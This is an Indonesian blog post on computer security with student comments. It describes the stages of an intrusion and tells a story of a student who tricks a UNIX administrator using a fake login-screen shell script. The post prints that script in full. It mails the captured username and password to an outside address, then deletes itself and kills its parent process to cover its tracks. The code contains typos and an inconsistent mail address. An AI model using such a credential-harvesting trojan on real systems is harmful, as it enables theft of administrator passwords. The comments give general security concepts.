Keamanan Komputer


MEMAHAMI HACKER BEKERJA
 
Secara umum melalui tahapan-tahapan sebagai berikut :
    1. Tahap mencari tahu system komputer sasaran.
    2. Tahap penyusupan
    3. Tahap penjelajahan
    4. Tahap keluar dan menghilangkan jejak.

Contoh kasus Trojan House, memanfaatkan SHELL script UNIX :
Seorang gadis cantik dan genit peserta kuliah UNIX di sebuah perguruan tinggi memiliki potensi memancing pengelola sistem komputer (administrator pemegang account root . . . hmmm) yang lengah. Ia melaporkan bahwa komputer tempat ia melakukan tugas-tugas UNIX yang diberikan tidak dapat dipergunakan. Sang pengelola sistem komputer tentu saja dengan gagah perkasa ingin menunjukkan kekuasaan sebagai administrator UNIX.
"Well, ini soal kecil. Mungkin password kamu ke blokir, biar saya perbaiki dari tempat kamu", ujar administrator UNIX sombong sambil duduk disebelah gadis cantik dan genit peserta kuliah tersebut.
Keesokan harinya, terjadilah kekacauan di sistem UNIX karena diduga terjadi penyusupan oleh hacker termasuk juga hompepage perguruan tinggi tersebut di-obok-obok, maklum pengelolanya masih sama. Selanjutnya pihak perguruan tinggi mengeluarkan press release bahwa homepage mereka dijebol oleh hacker dari Luar Negeri . . . . hihiii
Nah sebenarnya apa sih yang terjadi ?
Sederhana, gadis cantik dan genit peserta kuliah UNIX tersebut menggunakan program kecil my_login dalam bentuk shell script yang menyerupai layar login dan password sistem UNIX sebagai berikut:
#!/bin/sh
###################################
# Nama program : my_login
# Deskripsi :Program kuda trojan sederhana
# versi 1.0 Nopember 1999
####################################
COUNTER=0
Cat /etc/issue
While [ "$COUNTER" –ne 2 ]
do
let COUNTER=$COIUNTER+1
echo "login: \c"
read LOGIN
stty echo
echo "password: \c"
read PASSWORD
echo "User $LOGIN : $PASSWORD" | mail gadis@company.com
stty echo
echo
echo "Login Incorrect"
done
rm $0
kill –9 $PPID

Apabila program ini dijalankan maka akan ditampilkan layar login seperti layaknya awal penggunaan komputer pdaa sistem UNIX:

Login:
Password:

Lihatlah, Administrator UNIX yang gagah perkasa tadi yang tidak melihat gadis tersebut menjalankan program ini tentunya tidak sadar bahwa ini merupakan layar tipuan. Layar login ini tidak terlihat beda dibanding layar login sesungguhnya.
Seperti pada program login sesungguhnya, sistem komputer akan meminta pemakai untuk login ke dalam sistem. Setelah diisi password dan di enter,maka segera timbul pesan

Login:root
Password: ********
Login Incorrect

Tentu saja Administrator UNIX akan kaget bahwa passwordnya ternyata (seolah-olah) salah. Untuk itu ia segera mengulangi login dan password. Setelah dua kali ia mencoba login dan tidak berhasil, maka loginnya dibatalkan dan kembali keluar UNIX.
Perhatikan program di atas baik-baik, sekali pemakai tersebut mencoba login dan mengisi password pada layar di atas, setelah itu maka otomatis data login dan password tersebut akan di email ke mailto:hacker@company.com. Sampai disini maka si gadis lugu dan genit telah mendapatkan login dan password . . . ia ternyata seorang hacker !!
Walaupun sederhana, jika kita perhatikan lebih jauh lagi, maka program ini juga memiliki beberapa trik hacker lainnya, yaitu proses penghilangan jejak (masih ingat tahapan hacker yang ditulis di atas ?). Proses ini dilakukan pada 2 baris terakhir dari program my_login di atas, yaitu

rm $0
kill –9 $PPID

yang artinya akan segera dilakukan proses penghapusan program my_login dan hapus pula ID dari proses. Dengan demikian hilanglah program tersebut yang tentunya juga menhilangkan barang bukti. Ditambah lagi penghapusan terhadap jejak proses di dalam sistem UNIX. Zap . . . hilang sudah tanda-tanda bahwa hacker nya ternyata seorang gadis peserta kuliahnya.

Sukses dari program ini sebenarnya sangat tergantung dari bagaimana agar aplikasi ini dapat dieksekusi oleh root. Hacker yang baik memang harus berusaha memancing agar pemilik root menjalankan program ini.


Referensi :

Mohammad Iqbal, Skom, MMSi

 

7 komentar:

Unknown mengatakan...

keamanan komputer sangat penting bagi kita karena kumputer yang kita milki berisi file atau data-data yang penting dan memiliki hak untuk dipublikasikan atau tidak sama sekali untuk dikonsumsi publik...
seperti contoh kasus ariel yang menjadi korban dari lengah nya keamanan komputer....
khusnul abidin (10010053)
http://khusnulabidin.blogspot.com

Anonim mengatakan...

eko budianto Npm:10010050

Karakteristik Penyusup :
1. The Curious (Si Ingin Tahu) - tipe penyusup ini pada dasarnya tertarik menemukan jenis sistem dan data yang anda miliki.
2. The Malicious (Si Perusak) - tipe penyusup ini berusaha untuk merusak sistem anda, atau merubah web page anda, atau sebaliknya membuat waktu dan uang anda kembali pulih.
3. The High-Profile Intruder (Si Profil Tinggi) - tipe penyusup ini berusaha menggunakan sistem anda untuk memperoleh popularitas dan ketenaran. Dia mungkin menggunakan sistem profil tinggi anda untuk mengiklankan kemampuannya.
4. The Competition (Si Pesaing) - tipe penyusup ini tertarik pada data yang anda miliki dalam sistem anda. Ia mungkin seseorang yang beranggapan bahwa anda memiliki sesuatu yang dapat menguntungkannya secara keuangan atau sebaliknya.

anthonnionio mengatakan...

keamanan komputer sangat dibutuhkan dalam menyimpan data-data yang sangat penting...
bila komputer kita tidak aman maka akan seenak nya orang mencuri data-data yang penting buat kita...
sudah banyak terjadi pencurian data-data,seperti halnya data-data pemerintah yang memang harus yang harus dijaga erat-erat...

Eko_Budianto mengatakan...

eko budianto 10010050

tentang scurity breach accident

1996U.S. Federal Computer Incident Response Capability (FedCIRC) melaporkan bahwa lebih dari 2500 “insiden” di system komputer atau jaringan komputer yang disebabkan oleh gagalnya sistem keamanan atau adanya usaha untuk membobol sistem keamanan
1988Keamanan sistem mail sendmail dieksploitasi oleh RobertTapan Morris sehingga melumpuhkan sistem Internet. Kegiatanini dapat diklasifikasikan sebagai “denial of service attack”.Diperkirakan biaya yang digunakan untuk memperbaiki dan hal-hal lain yang hilang adalah sekitar $100 juta. Di tahun 1990 Morrisdihukum (convicted) dan hanya didenda $10.000.

Eko_Budianto mengatakan...

eko budianto

SECURITY BREACH ACCIDENT


1996U.S. Federal Computer Incident Response Capability (FedCIRC) melaporkan bahwa lebih dari 2500 “insiden” di system komputer atau jaringan komputer yang disebabkan oleh gagalnya sistem keamanan atau adanya usaha untuk membobol sistem keamanan

1988Keamanan sistem mail sendmail dieksploitasi oleh RobertTapan Morris sehingga melumpuhkan sistem Internet. Kegiatanini dapat diklasifikasikan sebagai “denial of service attack”.Diperkirakan biaya yang digunakan untuk memperbaiki dan hal-hal lain yang hilang adalah sekitar $100 juta. Di tahun 1990 Morrisdihukum (convicted) dan hanya didenda $10.000.

fandi_fandyblog mengatakan...

M. FANDI MULYADI 10019005
Keamanan komputer adalah suatu cabang teknologi yang dikenal dengan nama keamanan informasi yang diterapkan pada komputer. Sasaran keamanan komputer antara lain adalah sebagai perlindungan informasi terhadap pencurian atau korupsi, atau pemeliharaan ketersediaan, seperti dijabarkan dalam kebijakan keamanan.

Menurut Garfinkel dan Spafford, ahli dalam computer security, komputer dikatakan aman jika bisa diandalkan dan perangkat lunaknya bekerja sesuai dengan yang diharapkan. Keamanan komputer memiliki 5 tujuan, yaitu:

Availability
Confidentiality
Data Integrity
Control
Audit

Keamanan komputer memberikan persyaratan terhadap komputer yang berbeda dari kebanyakan persyaratan sistem karena sering kali berbentuk pembatasan terhadap apa yang tidak boleh dilakukan komputer. Ini membuat keamanan komputer menjadi lebih menantang karena sudah cukup sulit untuk membuat program komputer melakukan segala apa yang sudah dirancang untuk dilakukan dengan benar. Persyaratan negatif juga sukar untuk dipenuhi dan membutuhkan pengujian mendalam untuk verifikasinya, yang tidak praktis bagi kebanyakan program komputer. Keamanan komputer memberikan strategi teknis untuk mengubah persyaratan negatif menjadi aturan positif yang dapat ditegakkan.

Pendekatan yang umum dilakukan untuk meningkatkan keamanan komputer antara lain adalah dengan membatasi akses fisik terhadap komputer, menerapkan mekanisme pada perangkat keras dan sistem operasi untuk keamanan komputer, serta membuat strategi pemrograman untuk menghasilkan program komputer yang dapat diandalkan.
Nuvola apps mycomputer.png

fandi_fandyblog mengatakan...

10019005
M FANDI MULYADI
Kesimpulan yang dapat ditarik dari mata kuliah keamanan komputer adalah :
 Pengamanan komputer dari faktor Lingkungan atau alam yaitu :
o Pengamanan dari Faktor Manusia.
o Pengamanan dari Faktor Binatang.
o Pengamanan dari Faktor Tumbuhan.
o Pengamanan dari Faktor Cuaca.
o Pengamanan dari Faktor Ikim.
o Pengamanan dari Faktor Bencana Alam.
 Pengamanan dari Faktor Fisika.
 Pengamanan dari Faktor Kimia.
 Pengamanan dari Faktor Perangkat Keras.
 Pengamanan dari Faktor Perangkat Lunak.
 Pengamanan dari Faktor Sistem Operasi.
 Pengamanan dari Faktor Manajemen.
 Pengamanan dari Faktor Organisasi.
 Pengamanan dari Faktor Telekomunikasi.

Kesimpulan keamanan jaringan komputer
a. Jaringan komputer internet yang sifatnya publik dan global pada dasarnya kurang aman.
b. Untuk meningkatkan keamanan jaringan internet dapat menggunakan beberapa metode, contohnya metode authentikasi, penggunaan metode enkripsi-dekripsi, dan menggunakan Firewall.
c. Kelemahan suatu sistem jaringan dapat dilihat dengan menggunakan tool-tool seperti scanner, TCP/IP assembler, Network Protocol Analyzer, dan lain-lain.
d. Selain teknologi yang berguna untuk menjaga keamanan jaringan internet, faktor orang, dalam hal ini pengguna jaringan internet, harus juga mempunyai etika berinternet yang baik.
Kelebihan dan Kekurangan OS Windows dengan OS lain
Dapat disimpulkan, Bahwa MacOS merupakan pasukan terbaik pertama dengan desain yang elegan dan sistem yang aman namun memiliki kelemahan pada pilihan hardware dan softwarenya. Di tempat kedua diduduki oleh Windows Vista dengan keamanan yang lebih baik walaupun kita harus membeli ulang banyak software jika ingin optimal. Linux menduduki posisi ketiga karena tingkat keamanannya yang tinggi namun berhubung banyaknya pengembang sistem operasi ini mengakibatkan penggunaannya masih terlalu rumit. Windows XP harus rela menduduki posisi terakhir, karena walaupun dengan service pack 2, windows XP masih belum sepenuhnya aman.